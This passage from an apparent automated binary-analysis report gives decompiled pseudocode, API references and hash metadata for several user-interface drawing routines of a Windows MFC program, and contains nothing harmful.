							L00401BA9(_t92 + 0x4b4, _t90);
							_push(0);
							E004013D4( *((intOrPtr*)(_t92 + 0x370)));
							L004018D9(_t92 + 0x218);
							 *((intOrPtr*)(_t92 + 0x388)) = _t90;
							_t49 = GetTickCount();
							 *(_t92 + 0x390) = _t49;
						}
						L17:
						 *(_t94 - 4) = 0;
					}
					L00425DFC();
				} else {
					_push(0xffffffff);
					_push(0);
					_push(0x806c);
					L00425E56();
				}
				 *(_t94 - 4) =  *(_t94 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t94 - 0xc));
				return _t49;
			}

0x0040cd56
0x0040cd5b
0x0040cd60
0x0040cd66
0x0040cd6b
0x0040cd76
0x0040cd79
0x0040cd81
0x0040cd85
0x0040cd89
0x0040cd91
0x0040cd94
0x0040cd99
0x0040cd9f
0x0040cdb5
0x0040cdbf
0x0040cdc4
0x0040cecf
0x0040ced4
0x0040ced9
0x0040ceda
0x0040cedd
0x0040cee2
0x0040cee3
0x0040cee7
0x0040ceef
0x0040cef0
0x0040cef1
0x0040cef4
0x0040cef9
0x0040cdd5
0x0040cdd8
0x0040cdde
0x0040cde1
0x0040cde9
0x0040cded
0x0040cdf2
0x0040ceb7
0x0040ceb9
0x0040ceba
0x0040cebf
0x0040ce01
0x0040ce01
0x0040ce03
0x0040ce09
0x0040ce0e
0x0040ce12
0x0040ce36
0x0040ce14
0x0040ce14
0x0040ce1b
0x0040ce1c
0x0040ce22
0x0040ce25
0x0040ce26
0x0040ce2e
0x0040ce2f
0x0040ce2f
0x0040ce38
0x0040ce3b
0x0040ce3f
0x0040ce47
0x0040ce4a
0x0040ce4a
0x0040ce51
0x00000000
0x00000000
0x0040ce53
0x0040ce55
0x0040ce57
0x0040ce5c
0x0040ce64
0x0040ce76
0x0040ce66
0x0040ce66
0x0040ce6f
0x00000000
0x0040ce6f
0x00000000
0x0040ce64
0x0040ce85
0x0040ce87
0x0040ce92
0x0040ce93
0x0040ce9e
0x0040cea3
0x0040cea9
0x0040ceaf
0x0040ceaf
0x0040cec4
0x0040cec4
0x0040cec7
0x0040ceff
0x0040cda1
0x0040cda1
0x0040cda3
0x0040cda4
0x0040cda9
0x0040cda9
0x0040cf04
0x0040cf0b
0x0040cf15
0x0040cf1e

APIs

_EH_prolog.MSVCRT ref: 0040CD56
#540.MFC42 ref: 0040CD66

Part of subcall function 004013A7: _EH_prolog.MSVCRT ref: 0040BD7D
Part of subcall function 004013A7: #540.MFC42 ref: 0040BD92
Part of subcall function 004013A7: SendMessageA.USER32 ref: 0040BDAA
Part of subcall function 004013A7: #535.MFC42(?), ref: 0040BDBB
Part of subcall function 004013A7: #800.MFC42(?), ref: 0040BE47

#858.MFC42(00000000), ref: 0040CD89
#800.MFC42(00000000), ref: 0040CD94
#1199.MFC42(0000806C,00000000,000000FF,00000000), ref: 0040CDA9
#823.MFC42(0000002C,?,00000000), ref: 0040CE03
#535.MFC42(?,?,00000000,?,00000000), ref: 0040CE26
#2029.MFC42(?,?,?,00000000), ref: 0040CE4A
#1199.MFC42(0000804E,00000024,000000FF,?,?,?,00000000), ref: 0040CE5C
#800.MFC42(?,00000000,00000000,00000000), ref: 0040CEFF
#800.MFC42(?,00000000,00000000,00000000), ref: 0040CF0B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#1199#535#540H_prolog$#2029#823#858MessageSend
String ID:
API String ID: 3380375941-0
Opcode ID: 1457749dfa02fb01b1558796a6bec429f65faaf2105fcdd023fcc1e8c755fd67
Instruction ID: 7d23578721cc828676654486031409b35623256d2895c200847595b70330aeb1
Opcode Fuzzy Hash: 1457749dfa02fb01b1558796a6bec429f65faaf2105fcdd023fcc1e8c755fd67
Instruction Fuzzy Hash: FE51E770A04219EEDB04EBA5C886AFFB7B9AF40318F50052FF112B71D1DB781A05D769

Uniqueness

Uniqueness Score: -1.00%

Function 00401564, Relevance: 24.1, APIs: 16, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401564(void* __ecx) {
				int _t37;
				struct HDC__* _t38;
				int _t42;
				struct HBRUSH__* _t43;
				intOrPtr* _t47;
				intOrPtr _t48;
				signed int _t57;
				void* _t75;
				void* _t77;
				struct HDC__* _t78;
				void* _t80;

				L004269E6();
				_t75 = __ecx;
				L00425FD6();
				_t37 = SendMessageA( *(__ecx + 0x20), 0x1004, 0, 0);
				if(_t37 == 0) {
					_t38 = GetDC( *(_t75 + 0x20));
					L00425FD0();
					_t78 = _t38;
					 *((intOrPtr*)(_t80 - 0x14)) =  *((intOrPtr*)(_t78->i + 0x24))(_t38, _t77);
					_t42 = GetClientRect( *(_t75 + 0x20), _t80 - 0x34);
					L00425FCA();
					if(_t42 != 0) {
						SendMessageA( *(_t42 + 0x20), 0x1207, 0, _t80 - 0x24);
						 *((intOrPtr*)(_t80 - 0x30)) =  *((intOrPtr*)(_t80 - 0x30)) +  *((intOrPtr*)(_t80 - 0x18));
					}
					_t43 = GetSysColor(5);
					_push(_t43);
					L00425FC4();
					if(_t43 != 0) {
						_t43 =  *(_t43 + 4);
					}
					FillRect( *(_t78 + 4), _t80 - 0x34, _t43);
					 *((intOrPtr*)(_t80 - 0x1c)) = 0x42c514;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					L00425FA6();
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					_t57 = 1;
					L00425FBE();
					_t47 =  *((intOrPtr*)(_t78->i + 0x2c))(0xc, _t57);
					L00425FB8();
					_t48 =  *_t47;
					 *(_t80 - 4) = _t57;
					 *((intOrPtr*)(_t78->i + 0x70))(_t48,  *((intOrPtr*)(_t48 - 8)), _t80 - 0x34, 0x935, 0x8066);
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					L00425DFC();
					 *((intOrPtr*)(_t78->i + 0x28))( *((intOrPtr*)(_t80 - 0x14)));
					_t37 = ReleaseDC( *(_t75 + 0x20),  *(_t78 + 4));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t37;
			}

0x0040991f
0x00409929
0x0040992b
0x00409942
0x00409946
0x00409950
0x00409957
0x0040995c
0x00409965
0x0040996f
0x00409977
0x0040997e
0x0040998e
0x00409993
0x00409993
0x00409998
0x0040999e
0x004099a2
0x004099a9
0x004099ab
0x004099ab
0x004099b6
0x004099bc
0x004099c3
0x004099ca
0x004099cf
0x004099d5
0x004099d9
0x004099e4
0x004099ef
0x004099f4
0x004099f8
0x00409a0b
0x00409a0e
0x00409a15
0x00409a21
0x00409a2a
0x00409a30
0x00409a36
0x00409a3e

APIs

_EH_prolog.MSVCRT ref: 0040991F
#2379.MFC42 ref: 0040992B
SendMessageA.USER32 ref: 00409942
GetDC.USER32(?), ref: 00409950
#2859.MFC42(00000000), ref: 00409957
GetClientRect.USER32 ref: 0040996F
#6696.MFC42 ref: 00409977
SendMessageA.USER32 ref: 0040998E
GetSysColor.USER32(00000005), ref: 00409998
#283.MFC42(00000000), ref: 004099A2
FillRect.USER32 ref: 004099B6
#2414.MFC42 ref: 004099CA
#5875.MFC42(00000001), ref: 004099D9
#537.MFC42(00008066), ref: 004099EF
#800.MFC42 ref: 00409A15
ReleaseDC.USER32 ref: 00409A2A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageRectSend$#2379#2414#283#2859#537#5875#6696#800ClientColorFillH_prologRelease
String ID:
API String ID: 2411248202-0
Opcode ID: c9a4aaa7591ea7164f80679881a354df9e6ea51f771ca0ecc83786f441ce0a2b
Instruction ID: a15132f754b8294fd7113b327c9f268ae83e73d8a896c85b42764a1a0129dbc1
Opcode Fuzzy Hash: c9a4aaa7591ea7164f80679881a354df9e6ea51f771ca0ecc83786f441ce0a2b
Instruction Fuzzy Hash: 44319C71A00615AFDB14EBA4DD49EAEB7B5FF48310F10022AF142A72E1DB749D00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004019D3, Relevance: 24.1, APIs: 16, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004019D3(void* __ecx) {
				int _t37;
				struct HDC__* _t38;
				int _t42;
				struct HBRUSH__* _t43;
				intOrPtr* _t47;
				intOrPtr _t48;
				signed int _t57;
				void* _t75;
				void* _t77;
				struct HDC__* _t78;
				void* _t80;

				L004269E6();
				_t75 = __ecx;
				L00425FD6();
				_t37 = SendMessageA( *(__ecx + 0x20), 0x1004, 0, 0);
				if(_t37 == 0) {
					_t38 = GetDC( *(_t75 + 0x20));
					L00425FD0();
					_t78 = _t38;
					 *((intOrPtr*)(_t80 - 0x14)) =  *((intOrPtr*)(_t78->i + 0x24))(_t38, _t77);
					_t42 = GetClientRect( *(_t75 + 0x20), _t80 - 0x34);
					L00425FCA();
					if(_t42 != 0) {
						SendMessageA( *(_t42 + 0x20), 0x1207, 0, _t80 - 0x24);
						 *((intOrPtr*)(_t80 - 0x30)) =  *((intOrPtr*)(_t80 - 0x30)) +  *((intOrPtr*)(_t80 - 0x18));
					}
					_t43 = GetSysColor(5);
					_push(_t43);
					L00425FC4();
					if(_t43 != 0) {
						_t43 =  *(_t43 + 4);
					}
					FillRect( *(_t78 + 4), _t80 - 0x34, _t43);
					 *((intOrPtr*)(_t80 - 0x1c)) = 0x42c514;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					L00425FA6();
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					_t57 = 1;
					L00425FBE();
					_t47 =  *((intOrPtr*)(_t78->i + 0x2c))(0xc, _t57);
					L00425FB8();
					_t48 =  *_t47;
					 *(_t80 - 4) = _t57;
					 *((intOrPtr*)(_t78->i + 0x70))(_t48,  *((intOrPtr*)(_t48 - 8)), _t80 - 0x34, 0x935, 0x8066);
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					L00425DFC();
					 *((intOrPtr*)(_t78->i + 0x28))( *((intOrPtr*)(_t80 - 0x14)));
					_t37 = ReleaseDC( *(_t75 + 0x20),  *(_t78 + 4));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t37;
			}

0x004086f7
0x00408701
0x00408703
0x0040871a
0x0040871e
0x00408728
0x0040872f
0x00408734
0x0040873d
0x00408747
0x0040874f
0x00408756
0x00408766
0x0040876b
0x0040876b
0x00408770
0x00408776
0x0040877a
0x00408781
0x00408783
0x00408783
0x0040878e
0x00408794
0x0040879b
0x004087a2
0x004087a7
0x004087ad
0x004087b1
0x004087bc
0x004087c7
0x004087cc
0x004087d0
0x004087e3
0x004087e6
0x004087ed
0x004087f9
0x00408802
0x00408808
0x0040880e
0x00408816

APIs

_EH_prolog.MSVCRT ref: 004086F7
#2379.MFC42 ref: 00408703
SendMessageA.USER32 ref: 0040871A
GetDC.USER32(?), ref: 00408728
#2859.MFC42(00000000), ref: 0040872F
GetClientRect.USER32 ref: 00408747
#6696.MFC42 ref: 0040874F
SendMessageA.USER32 ref: 00408766
GetSysColor.USER32(00000005), ref: 00408770
#283.MFC42(00000000), ref: 0040877A
FillRect.USER32 ref: 0040878E
#2414.MFC42 ref: 004087A2
#5875.MFC42(00000001), ref: 004087B1
#537.MFC42(00008066), ref: 004087C7
#800.MFC42 ref: 004087ED
ReleaseDC.USER32 ref: 00408802

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageRectSend$#2379#2414#283#2859#537#5875#6696#800ClientColorFillH_prologRelease
String ID:
API String ID: 2411248202-0
Opcode ID: 4f8474e246dc04402eeafe547894c2d29a4cd05c6873ec01f217a856e8742f93
Instruction ID: 59ab62b80368e3d498a0ad11c81b5e79855cea6359353c648efeaaa442765969
Opcode Fuzzy Hash: 4f8474e246dc04402eeafe547894c2d29a4cd05c6873ec01f217a856e8742f93
Instruction Fuzzy Hash: 70318D35600615EFDB14EBA4DE49EAEBBB5FF48314F51012AF242A72E1DB749D00CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040221B, Relevance: 24.1, APIs: 16, Instructions: 90
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040221B(void* __ecx) {
				intOrPtr _t43;
				intOrPtr _t47;
				intOrPtr _t51;
				int _t54;
				signed int _t60;
				void* _t79;
				void* _t81;

				L004269E6();
				_t79 = __ecx;
				L00425E08();
				 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
				_t60 = 8;
				_push(0x8053);
				memset(_t81 - 0x30, 0, _t60 << 2);
				 *(_t81 - 0x30) = 4;
				L00425E02();
				_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t43);
				 *((intOrPtr*)(_t81 - 0x20)) = _t43;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t43;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 0, _t81 - 0x30);
				_push(0x8062);
				L00425E02();
				_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t47);
				 *((intOrPtr*)(_t81 - 0x20)) = _t47;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t47;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 1, _t81 - 0x30);
				_push(0x8054);
				L00425E02();
				_t51 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t51);
				 *((intOrPtr*)(_t81 - 0x20)) = _t51;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t51;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 2, _t81 - 0x30);
				_t54 = InvalidateRect( *(_t79 + 0x20), 0, 1);
				 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t54;
			}

0x00408cc6
0x00408cd0
0x00408cd6
0x00408cdb
0x00408ce1
0x00408ce7
0x00408cec
0x00408cf1
0x00408cf8
0x00408d03
0x00408d06
0x00408d07
0x00408d0a
0x00408d0f
0x00408d14
0x00408d17
0x00408d31
0x00408d33
0x00408d3b
0x00408d46
0x00408d49
0x00408d4a
0x00408d4d
0x00408d52
0x00408d57
0x00408d5a
0x00408d69
0x00408d6b
0x00408d73
0x00408d7e
0x00408d81
0x00408d82
0x00408d85
0x00408d8a
0x00408d8f
0x00408d92
0x00408da1
0x00408daa
0x00408db0
0x00408db7
0x00408dc2
0x00408dca

APIs

_EH_prolog.MSVCRT ref: 00408CC6
#540.MFC42 ref: 00408CD6
#4160.MFC42(00008053), ref: 00408CF8
#2915.MFC42(?,00008053), ref: 00408D0A
#5572.MFC42(000000FF,?,00008053), ref: 00408D17
SendMessageA.USER32 ref: 00408D31
#4160.MFC42(00008062), ref: 00408D3B
#2915.MFC42(?,00008062), ref: 00408D4D
#5572.MFC42(000000FF,?,00008062), ref: 00408D5A
SendMessageA.USER32 ref: 00408D69
#4160.MFC42(00008054), ref: 00408D73
#2915.MFC42(?,00008054), ref: 00408D85
#5572.MFC42(000000FF,?,00008054), ref: 00408D92
SendMessageA.USER32 ref: 00408DA1
InvalidateRect.USER32(?,00000000,00000001), ref: 00408DAA
#800.MFC42 ref: 00408DB7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2915#4160#5572MessageSend$#540#800H_prologInvalidateRect
String ID:
API String ID: 48214485-0
Opcode ID: 83f40467a351e36a4b5567928c4167afad32651e6ad344e3093d4734eb5e8c9b
Instruction ID: 49dc5990a1624752f263415201f855bb670c0a61d3516ceea62fc7a3aebcebe9
Opcode Fuzzy Hash: 83f40467a351e36a4b5567928c4167afad32651e6ad344e3093d4734eb5e8c9b
Instruction Fuzzy Hash: C5315EB1A10229AFDB10EFA4DC46EEEB3B4FB08314F40091AF161B31E1EB746904DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040173F, Relevance: 24.1, APIs: 16, Instructions: 90
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040173F(void* __ecx) {
				intOrPtr _t43;
				intOrPtr _t47;
				intOrPtr _t51;
				int _t54;
				signed int _t60;
				void* _t79;
				void* _t81;

				L004269E6();
				_t79 = __ecx;
				L00425E08();
				 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
				_t60 = 8;
				_push(0x8053);
				memset(_t81 - 0x30, 0, _t60 << 2);
				 *(_t81 - 0x30) = 4;
				L00425E02();
				_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t43);
				 *((intOrPtr*)(_t81 - 0x20)) = _t43;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t43;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 0, _t81 - 0x30);
				_push(0x8062);
				L00425E02();
				_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t47);
				 *((intOrPtr*)(_t81 - 0x20)) = _t47;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t47;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 1, _t81 - 0x30);
				_push(0x8054);
				L00425E02();
				_t51 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t51);
				 *((intOrPtr*)(_t81 - 0x20)) = _t51;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t51;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 2, _t81 - 0x30);
				_t54 = InvalidateRect( *(_t79 + 0x20), 0, 1);
				 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t54;
			}

0x00409eee
0x00409ef8
0x00409efe
0x00409f03
0x00409f09
0x00409f0f
0x00409f14
0x00409f19
0x00409f20
0x00409f2b
0x00409f2e
0x00409f2f
0x00409f32
0x00409f37
0x00409f3c
0x00409f3f
0x00409f59
0x00409f5b
0x00409f63
0x00409f6e
0x00409f71
0x00409f72
0x00409f75
0x00409f7a
0x00409f7f
0x00409f82
0x00409f91
0x00409f93
0x00409f9b
0x00409fa6
0x00409fa9
0x00409faa
0x00409fad
0x00409fb2
0x00409fb7
0x00409fba
0x00409fc9
0x00409fd2
0x00409fd8
0x00409fdf
0x00409fea
0x00409ff2

APIs

_EH_prolog.MSVCRT ref: 00409EEE
#540.MFC42 ref: 00409EFE
#4160.MFC42(00008053), ref: 00409F20
#2915.MFC42(?,00008053), ref: 00409F32
#5572.MFC42(000000FF,?,00008053), ref: 00409F3F
SendMessageA.USER32 ref: 00409F59
#4160.MFC42(00008062), ref: 00409F63
#2915.MFC42(?,00008062), ref: 00409F75
#5572.MFC42(000000FF,?,00008062), ref: 00409F82
SendMessageA.USER32 ref: 00409F91
#4160.MFC42(00008054), ref: 00409F9B
#2915.MFC42(?,00008054), ref: 00409FAD
#5572.MFC42(000000FF,?,00008054), ref: 00409FBA
SendMessageA.USER32 ref: 00409FC9
InvalidateRect.USER32(?,00000000,00000001), ref: 00409FD2
#800.MFC42 ref: 00409FDF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2915#4160#5572MessageSend$#540#800H_prologInvalidateRect
String ID:
API String ID: 48214485-0
Opcode ID: 004684ae2ddc33a2b49614150aa251e3cd17b8de10f84a08757036d9ba0fdab5
Instruction ID: 8d6b8eb882a0221f8f40c0e44187407a9693960e151f95c22c1008f344936c85
Opcode Fuzzy Hash: 004684ae2ddc33a2b49614150aa251e3cd17b8de10f84a08757036d9ba0fdab5
Instruction Fuzzy Hash: D2313EB1A10629AFDB10EFA4DC46EEEB3B4FB08314F50091AF161B71E1EB746904DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00422626, Relevance: 22.6, APIs: 15, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00422626(void* __ecx) {
				struct tagRECT* _v0;
				intOrPtr _v4;
				struct HWND__* _t17;
				long _t27;
				intOrPtr _t39;
				void* _t47;
				intOrPtr _t49;
				struct tagRECT* _t50;
				struct tagRECT* _t52;

				_t47 = __ecx;
				_t17 = GetParent( *(__ecx + 0x20));
				_push(_t17);
				L00426372();
				_t49 =  *((intOrPtr*)(_t47 + 0x9c));
				if(_t49 == 0) {
					_push(__imp__#1842);
					L004264F2();
					_t50 = _v0;
					_t39 = _v4;
					if(_t17 != 0) {
						DrawEdge( *(_t39 + 4), _t50, 6, 2);
					}
					_push(GetSysColor(0x14));
					_push(GetSysColor(0x10));
					_push(_t50->bottom - 0x1e);
					_push(_t50->right);
					_push(0x1e);
					_push(0);
					L00426906();
					_push(GetSysColor(0x16));
					_push(0);
					_push(_t50->bottom - 0x20);
					_t27 = _t50->right;
					_push(_t27);
					_push(0x1f);
					L8:
					_push(1);
					L00426906();
					return _t27;
				}
				if(_t49 == 1) {
					_push(__imp__#1842);
					L004264F2();
					_t52 = _v0;
					_t39 = _v4;
					if(_t17 != 0) {
						DrawEdge( *(_t39 + 4), _t52, 6, 8);
					}
					_push(GetSysColor(0x14));
					_push(GetSysColor(0x10));
					_push(_t52->bottom - 0x1d);
					_push(_t52->right);
					_push(0);
					_push(0);
					L00426906();
					_push(GetSysColor(0x16));
					_push(0);
					_push(_t52->bottom - 0x1f);
					_t27 = _t52->right;
					_push(_t27);
					_push(1);
					goto L8;
				}
				return _t17;
			}

0x00422628
0x0042262e
0x00422634
0x00422635
0x00422642
0x00422645
0x004226b0
0x004226b6
0x004226bb
0x004226bf
0x004226c5
0x004226cf
0x004226cf
0x004226df
0x004226e4
0x004226ed
0x004226ee
0x004226f1
0x004226f3
0x004226f5
0x004226fe
0x00422705
0x00422707
0x0042270c
0x0042270d
0x0042270e
0x00422710
0x00422710
0x00422714
0x00000000
0x00422714
0x00422648
0x0042264e
0x00422654
0x00422659
0x0042265d
0x00422663
0x0042266d
0x0042266d
0x0042267d
0x00422682
0x0042268b
0x0042268c
0x0042268f
0x00422691
0x00422693
0x0042269c
0x004226a3
0x004226a5
0x004226aa
0x004226ab
0x004226ac
0x00000000
0x004226ac
0x0042271c

APIs

GetParent.USER32(?), ref: 0042262E
#2864.MFC42(00000000), ref: 00422635
#4083.MFC42(00000000), ref: 00422654
DrawEdge.USER32(?,?,00000006,00000008), ref: 0042266D
GetSysColor.USER32(00000014), ref: 0042267B
GetSysColor.USER32(00000010), ref: 00422680
#2566.MFC42(00000000,00000000,?,?,00000000), ref: 00422693
GetSysColor.USER32(00000016), ref: 0042269A
#4083.MFC42(00000000), ref: 004226B6
DrawEdge.USER32(?,?,00000006,00000002), ref: 004226CF
GetSysColor.USER32(00000014), ref: 004226DD
GetSysColor.USER32(00000010), ref: 004226E2
#2566.MFC42(00000000,0000001E,?,?,00000000), ref: 004226F5
GetSysColor.USER32(00000016), ref: 004226FC
#2566.MFC42(00000001,0000001F,?,?,00000000,00000000), ref: 00422714

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
